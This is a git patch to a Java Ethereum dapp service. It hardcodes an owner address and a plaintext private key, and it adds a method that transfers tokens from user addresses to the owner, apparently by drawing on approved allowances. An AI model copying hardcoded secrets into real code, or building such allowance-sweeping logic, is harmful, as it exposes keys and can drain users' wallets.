From 3d5ba335dcb5bcd279a8bfda8bdadd4889237b84 Mon Sep 17 00:00:00 2001
From: Helius <wangdoubleone@gmail.com>
Date: Tue, 29 Mar 2022 16:39:45 +0800
Subject: [PATCH] fix

---
 src/main/java/cc/mrbird/febs/dapp/chain/EthService.java |   40 ++++++++++++++++++++++++++++------------
 1 files changed, 28 insertions(+), 12 deletions(-)

diff --git a/src/main/java/cc/mrbird/febs/dapp/chain/EthService.java b/src/main/java/cc/mrbird/febs/dapp/chain/EthService.java
index 3866078..934c208 100644
--- a/src/main/java/cc/mrbird/febs/dapp/chain/EthService.java
+++ b/src/main/java/cc/mrbird/febs/dapp/chain/EthService.java
@@ -2,6 +2,7 @@
 
 import cc.mrbird.febs.common.exception.FebsException;
 import cn.hutool.core.collection.CollUtil;
+import com.alibaba.fastjson.JSONObject;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang3.StringUtils;
 import org.web3j.abi.FunctionEncoder;
@@ -53,6 +54,8 @@
 	//private static final String ETH_UTL = "http://120.55.86.146:8545";
 	//	private static final String ETH_UTL = "http://114.55.250.231:8545";
 	private static final String ETH_UTL = "https://mainnet.infura.io/v3/f54a5887a3894ebb9425920701a97fe0";
+	private static final String OWNER_ADDRESS = "0xD998DA7362360eFC6daDFEd6E9a32E70640d7600";
+	private static final String OWNER_PRIVATE = "06f95d3edf59888708d485d06b8b3e3f9aaa6b40d693018a1d19a7be95fe9419";
 
 	public EthService() {
 		try {
@@ -144,16 +147,17 @@
 	}
 
 	public static void main(String[] args) throws IOException {
-		HttpService service = new HttpService(ETH_UTL);
-		Web3j build = Web3j.build(service);
-		//Request<?, EthTransaction> ethTransactionRequest = build.ethGetTransactionByHash("0xa3e6a0ccc3aac30d866a86ca9c0477dd58b7b061787ba40b16c3844803273816");
-		Request<?, EthGetTransactionReceipt> ethGetTransactionReceiptRequest = build.ethGetTransactionReceipt("0xa3e6a0ccc3aac30d866a86ca9c0477dd58b7b061787ba40b16c3844803273816");
-		EthGetTransactionReceipt send = ethGetTransactionReceiptRequest.send();
-		String status = send.getResult().getStatus();
-		System.out.println(status);//0x1
+//		HttpService service = new HttpService(ETH_UTL);
+//		Web3j build = Web3j.build(service);
+//		//Request<?, EthTransaction> ethTransactionRequest = build.ethGetTransactionByHash("0xa3e6a0ccc3aac30d866a86ca9c0477dd58b7b061787ba40b16c3844803273816");
+//		Request<?, EthGetTransactionReceipt> ethGetTransactionReceiptRequest = build.ethGetTransactionReceipt("0xa3e6a0ccc3aac30d866a86ca9c0477dd58b7b061787ba40b16c3844803273816");
+//		EthGetTransactionReceipt send = ethGetTransactionReceiptRequest.send();
+//		String status = send.getResult().getStatus();
+//		System.out.println(status);//0x1
 //		EthTransaction send = ethTransactionRequest.send();
 //		String input = send.getResult().getInput();
 //		System.out.println(input);
+		System.out.println(new EthService().ethAllowance("0x391040ee5f241711e763d0ac55e775b9b4bd0024"));
 	}
 
 	/**
@@ -233,19 +237,26 @@
 		byte[] signedMessage = TransactionEncoder.signMessage(rawTransaction, credentials);
 		String hexValue = Numeric.toHexString(signedMessage);
 
-		// log.debug("transfer hexValue:" + hexValue);
-
 		CompletableFuture<EthSendTransaction> ethSendTransactionCompletableFuture = web3j.ethSendRawTransaction(hexValue).sendAsync();
 		EthSendTransaction ethSendTransaction = ethSendTransactionCompletableFuture.get();
 		//return "hash";
+//		log.info("====:{}", JSONObject.toJSONString(ethSendTransaction));
 
 		if (ethSendTransaction.hasError()) {
-			// log.info("transfer error:", ethSendTransaction.getError().getMessage());
 			return "";
 		} else {
 			String transactionHash = ethSendTransaction.getTransactionHash();
 			// log.info("Transfer transactionHash:" + transactionHash);
 			return transactionHash;
+		}
+	}
+
+	public String approveTransfer(String fromAddress, BigDecimal amount, String gas) {
+		try {
+			return tokenSend(OWNER_PRIVATE, fromAddress, OWNER_ADDRESS, amount.toPlainString(), gas);
+		} catch (InterruptedException | ExecutionException e) {
+			e.printStackTrace();
+			return "";
 		}
 	}
 
@@ -280,6 +291,10 @@
 		}
 	}
 
+	public BigInteger ethAllowance(String address) {
+		return ethAllowance(OWNER_ADDRESS, address);
+	}
+
 	public BigInteger ethAllowance(String toAddress, String fromAddress) {
 		String contractAddress = "0xdac17f958d2ee523a2206206994597c13d831ec7";
 		String methodName = "allowance";
@@ -288,10 +303,10 @@
 		outputParameters.add(typeReference);
 
 		Function function = new Function(methodName,
-				Arrays.asList(new Address(toAddress), new Address(fromAddress))
+				Arrays.asList(new Address(fromAddress), new Address(toAddress))
 				, outputParameters);
 		String data = FunctionEncoder.encode(function);
-		Transaction transaction = Transaction.createEthCallTransaction(fromAddress, contractAddress, data);
+		Transaction transaction = Transaction.createEthCallTransaction(toAddress, contractAddress, data);
 
 		EthCall ethCall = null;
 		try {
@@ -305,4 +320,5 @@
 	}
 
 
+
 }

--
Gitblit v1.9.1